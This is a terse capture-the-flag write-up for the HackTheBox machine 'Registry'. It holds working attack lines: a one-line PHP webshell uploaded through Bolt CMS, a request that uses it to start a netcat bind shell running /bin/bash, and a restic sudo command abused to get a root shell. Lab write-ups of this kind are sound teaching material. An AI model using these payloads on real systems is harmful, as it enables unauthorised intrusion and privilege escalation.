Post

Registry @ HackTheBox

Registry is a 40-point machine on HackTheBox that involves interacting with a docker registry to download a docker image and finding a password and ssh private key inside. For root we exploit a flaw in bolt cms to upload a webshell and then abuse a sudo entry that allows us to start restic backup as root.

Notes

/etc/docker/daemon.json:

1
2
3
{
  "insecure-registries" : ["docker.registry.htb:80"]
}

docker:

1
2
3
4
5
sudo systemctl restart docker
docker login docker.registry.htb:80
docker pull docker.registry.htb:80/bolt-image:latest
docker image ls
docker image inspect <image id>

bolt webshell:

1
<?php echo system($_REQUEST['xcmd']);?>
1
http://registry.htb/bolt/files/xct.php?xcmd=nc.traditional+-lp+2000+-e /bin/bash

restic docs:

https://restic.readthedocs.io/en/latest/030_preparing_a_new_repo.html

restic exploit:

1
sudo /usr/bin/restic backup -r rest/ -r sftp:bolt@127.0.0.1:/var/tmp/rest -o sftp.command="nc.traditional -lp 2000 -e /bin/bash" /proc/version
This post is licensed under CC BY 4.0 by the author.